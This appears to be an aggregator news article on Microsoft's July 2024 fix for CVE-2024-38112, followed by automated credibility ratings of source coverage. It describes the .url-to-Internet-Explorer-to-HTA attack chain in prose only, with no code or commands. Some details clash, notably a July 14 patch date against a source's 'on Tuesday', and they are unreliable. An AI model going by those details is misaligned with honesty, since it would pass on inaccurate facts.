Microsoft's July 2024 Security Update: Patching the High-Severity CVE-2024-38112 Spoofing Vulnerability in Windows MSHTML Platform

Redmond, Washington United States of America
In July 2024, Microsoft released a patch for CVE-2024-38112, a high severity spoofing vulnerability in the Windows MSHTML Platform.
Microsoft was notified of the vulnerability in May 2024 and released a patch on July 14, 2024.
The vulnerability allowed attackers to trick users into opening malicious files or websites by disguising them as legitimate ones.
Microsoft's July 2024 Security Update: Patching the High-Severity CVE-2024-38112 Spoofing Vulnerability in Windows MSHTML Platform

In July 2024, Microsoft released a series of security updates to address multiple vulnerabilities affecting various Microsoft products. Among these vulnerabilities was CVE-2024-38112, a spoofing vulnerability in the Windows MSHTML Platform that had reportedly been exploited by attackers for over a year prior to its discovery and patching. This article will provide an overview of the vulnerability, its impact, and how it was exploited.

CVE-2024-38112 is a high severity vulnerability with a CVSS score of 7.05 that allows attackers to trick users into opening malicious files or websites by disguising them as legitimate ones. The vulnerability specifically affects the Windows MSHTML Platform, which is used to render HTML content in various Microsoft applications such as Internet Explorer and Microsoft Office.

The exploitation of CVE-2024-38112 involved attackers creating special Windows Internet Shortcut files (.url) that, when clicked, would call the retired Internet Explorer browser to visit an attacker-controlled URL. By opening the URL with Internet Explorer instead of a more secure browser like Chrome or Edge, users unknowingly granted attackers significant advantages in exploiting their systems.

Once a user opened the malicious .url file, they would be prompted to save or open the file. If they chose to open it, believing it to be a PDF or other benign file due to its misleading icon and filename, they would inadvertently launch an HTA (HTML application) file that executed remote code on their system.

The exploitation of CVE-2024-38112 was particularly concerning because it allowed attackers to bypass modern security features in Windows 10 and 11, which were designed to prevent the use of Internet Explorer for opening files or visiting websites. This made it easier for attackers to target users who had not yet upgraded their systems or disabled Internet Explorer altogether.

Microsoft was notified of the vulnerability in May 2024 by Haifei Li of Check Point Research, who had discovered samples of its exploitation dating back to January 2023. In response, Microsoft released a patch for CVE-2024-38112 on July 14, 2024, which prevented URL files from triggering the MHTML: URI handler and thus prevented the exploitation of this vulnerability.

It is important for users to apply security patches as soon as they become available to protect their systems from known vulnerabilities. In this case, users should have applied the patch for CVE-2024-38112 as soon as it was released in July 2024. Additionally, users should be cautious when opening files or clicking on links from untrusted sources and should not bypass security warnings without careful consideration.

In summary, CVE-2024-38112 is a high severity vulnerability that was exploited by attackers for over a year before its discovery and patching. The vulnerability allowed attackers to trick users into opening malicious files or websites by disguising them as legitimate ones, granting the attackers significant advantages in exploiting the victim's system. Microsoft released a patch for CVE-2024-38112 on July 14, 2024, and users should apply this patch as soon as possible to protect their systems from this vulnerability.



Confidence

100%

No Doubts Found At Time Of Publication

Sources

97%

  • Unique Points
    • Microsoft fixed a Windows zero-day vulnerability, tracked as CVE-2024-38112, which had been actively exploited in attacks for eighteen months.
    • Haifei Li of Check Point Research discovered the vulnerability and reported it to Microsoft in May 2024, after finding samples exploiting it as far back as January 2023.
    • Threat actors have been distributing Windows Internet Shortcut Files (.url) to spoof legitimate-looking files like PDFs, but they actually download and launch HTA files to install password-stealing malware.
    • Internet Explorer is still included by default on Windows 10 and Windows 11, despite Microsoft announcing its retirement. It can be invoked and leveraged for malicious purposes.
    • Threat actors create .url files with icon indexes to make them appear as links to PDFs. When clicked, the specified web page opens in Internet Explorer, which automatically attempts to download a file that appears to be a PDF but is actually an HTA file.
    • When Internet Explorer downloads the HTA file, it asks if you wish to save or open it. If a user decides to open it, thinking it’s a PDF, and does not see the Mark of the Web alert, the file is allowed to run and installs Atlantida Stealer malware.
    • Microsoft has fixed CVE-2024-38112 by unregistering the mhtml: URI from Internet Explorer, so it now opens in Microsoft Edge instead.
  • Accuracy
    No Contradictions at Time Of Publication
  • Deception (100%)
    None Found At Time Of Publication
  • Fallacies (85%)
    The article contains a few informal fallacies and an example of inflammatory rhetoric. It also uses dichotomous depiction by presenting Internet Explorer as still being included by default in Windows 10 and Windows 11 despite Microsoft's announcement of its retirement, thus implying that it is still widely used for malicious purposes.
    • The flaw, tracked as CVE-2024-38112, is a high-severity MHTML spoofing issue fixed during the July 2024 Patch Tuesday security updates.
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

98%

  • Unique Points
    • CVE-2024-38080 is a Windows Hyper-V Elevation of Privilege Vulnerability with Important severity and CVSS score 7.8.
    • CVE-2024-38112 is a Windows MSHTML Platform Spoofing Vulnerability with Important severity and CVSS score 7.05.
    • CVE-2024-37985 is a Systematic Identification and Characterization of Proprietary Prefetchers vulnerability in * Arm systems with Important severity and no public exploitation.
    • CVE-2024-35264 is a .NET and Visual Studio Remote Code Execution Vulnerability with Important severity and CVSS score 8.1.
    • CVE-2024-38095 is a .NET and Visual Studio Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-30105 is a .NET Core and Visual Studio Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38101, CVE-2024-38102, and CVE-2024-38105 are all Windows Layer-2 Bridge Network Driver Denial of Service Vulnerabilities with Important severity and no public exploitation.
    • CVE-2024-38074, CVE-2024-38076, and CVE-2024-38077 are all Windows Remote Desktop Licensing Service Remote Code Execution Vulnerabilities with Critical severity and no public exploitation.
    • CVE-2024-38115 is a Microsoft Office Word Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38096 is a Microsoft Windows DNS Server Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38117 is a Microsoft Office Excel Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38119 is a Microsoft Windows Remote Procedure Call (RPC) Endpoint Mapper Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38116 is a Microsoft Office PowerPoint Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38118 is a Microsoft Windows Remote Desktop Protocol (RDP) Client Denial of Service Vulnerability with Important severity and no public exploitation.
  • Accuracy
    • Microsoft fixed a Windows zero-day vulnerability, tracked as CVE-2024-38112, which had been actively exploited in attacks for eighteen months.
    • The flaw is a high-severity MHTML spoofing issue that allows malicious scripts to bypass built-in security features.
  • Deception (100%)
    None Found At Time Of Publication
  • Fallacies (100%)
    None Found At Time Of Publication
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

95%

  • Unique Points
    • Threat actors exploited a Windows 0-day vulnerability for over a year before Microsoft fixed it.
    • Malicious code disguised as PDF files tricked users into opening Internet Explorer and executing malicious code.
  • Accuracy
    • The vulnerability caused devices to open Internet Explorer, a legacy browser that Microsoft had decommissioned.
  • Deception (100%)
    None Found At Time Of Publication
  • Fallacies (85%)
    The article contains an appeal to authority and inflammatory rhetoric. It also uses a dichotomous depiction of Microsoft's actions.
    • The vulnerability, which resided in the MSHTML engine of Windows, carried a severity rating of 7.0 out of 10.
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

94%

  • Unique Points
    • Microsoft Windows users are at risk from a previously unknown trick to attack their PCs.
    • The threat is now being actively exploited through a hidden vulnerability on your system, one that has just been patched by Microsoft.
    • Check Point warns that attackers are using special Windows Internet Shortcut files, which, when clicked, call the retired Internet Explorer (IE) to visit the attacker-controlled URL.
    • The vulnerability CVE-2024-38112 isn’t the only Microsoft Windows patch to make CISA’s list with a July 30 deadline. The government has also added CVE-2024-38080.
    • Updating Windows now will address both vulnerabilities, as well as a further 137 patches in Microsoft’s bulging July update.
  • Accuracy
    • The US government has added the vulnerability to its Known Exploit Vulnerability catalog and mandated all Windows systems in use by federal employees be updated or shut down within 21 days, by July 30.
    • CISA, the government’s cybersecurity agency, advises that threat actors have been using attacking techniques for quite some time.
    • Microsoft acknowledged this vulnerability had been exploited in its update and has published Check Point’s report on the issue.
  • Deception (80%)
    The article by Zak Doffman contains several instances of sensationalism and selective reporting. The title itself is misleading as it implies that all Windows users are at imminent risk and must update within 21 days or face consequences. However, the article later states that the vulnerability has been exploited for over a year, implying that many users may already be affected. This contradicts the urgency conveyed in the title. Additionally, while the article mentions two specific vulnerabilities and their deadlines for patching, it only focuses on CVE-2024-38112 and its exploitation through Internet Explorer. The second vulnerability, CVE-2024-38080, is mentioned in passing but not explored further. This selective reporting creates a false sense of urgency around one vulnerability while downplaying the importance of addressing the other. Furthermore, the article quotes Check Point warning about attackers exploiting these vulnerabilities and Microsoft acknowledging their existence, but it does not provide any evidence or citations to support these claims.
    • Microsoft Windows users are suddenly at risk from a ‘previously unknown’ trick to attack their PCs.
    • Serious new Window warning
    • CISA, the government’s cybersecurity agency has mandated all Windows systems in use by federal employees be updated or shut down within 21-days, by July 30.
    • ForbesWhatsApp ‘Spyware’ Warning-Are Your Messages Being Read?
    • Microsoft acknowledged this vulnerability had been exploited in its update
  • Fallacies (100%)
    None Found At Time Of Publication
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

88%

  • Unique Points
    • Microsoft released a patch for the spoofing vulnerability CVE-2024-38112 on Tuesday.
    • The vulnerability, which affects Windows MSHTML Platform, has likely been exploited by attackers in the wild for over a year.
    • Attackers used special Windows Internet Shortcut files (.url extension) to lure users into opening an attacker-controlled URL and gain significant advantages in exploiting the victim’s computer.
    • The vulnerability allows an attacker to trick the user into opening a malicious HTA (HTML application) file, which executes and enables remote code execution.
  • Accuracy
    No Contradictions at Time Of Publication
  • Deception (50%)
    The article contains selective reporting as the author only mentions two specific vulnerabilities (CVE-2024-38112 and CVE-2024-38021) out of possibly many that Microsoft has patched recently. The author also implies that these vulnerabilities are more significant than others by dedicating a large portion of the article to them, without providing any context or evidence to support this claim.
    • The author only mentions CVE-2024-38112 and CVE-2024-38021 out of possibly many vulnerabilities that Microsoft has patched recently.
    • The author dedicates a large portion of the article to these two vulnerabilities, implying that they are more significant than others without providing any context or evidence.
  • Fallacies (90%)
    No direct fallacies found in the author's statements. However, there are some potential issues with inflammatory rhetoric and appeals to authority. The article mentions that attackers have been exploiting a vulnerability for over a year but does not specify who discovered this or provide evidence beyond the claim of one researcher. Additionally, there is an appeal to authority in mentioning CISA's directive to agencies to apply the patch by a certain date. The inflammatory rhetoric comes from phrases like 'attackers have been using novel tricks' and 'gaining significant advantages', which are intended to evoke strong emotions but do not add substantive information.
    • ]CVE-2024-38112, a spoofing vulnerability in Windows MSHTML Platform for which Microsoft has released a fix on Tuesday, has likely been exploited by attackers in the wild for over a year, Check Point researcher Haifei Li has revealed.
    • ]Check Point Research recently discovered that threat actors have been using novel (or previously unknown) tricks to lure Windows users for remote code execution. Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL.
    • ]For example, if the attacker has an IE zero-day exploit – which is much easier to find compared to Chrome/Edge, the attacker could attack the victim to gain remote code execution immediately.
    • ]However, in the samples we analyzed, the threat actors didn't use any IE remote code execution exploit. Instead, they used another trick in IE – which is probably not publicly known previously – to the best of our knowledge – to trick the victim into gaining remote code execution.
    • ]The malicious .url samples we discovered could be dated back as early as January 2023 (more than one year ago) to the latest May 13, 2024 (…). This suggests that threat actors have been using the attacking techniques for quite some time.
    • CISA has added CVE-2024-38112 to its Known Exploited Vulnerabilities (KEV) catalog, thus ordering US federal civilian executive branch agencies to apply the patch by July 30.
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication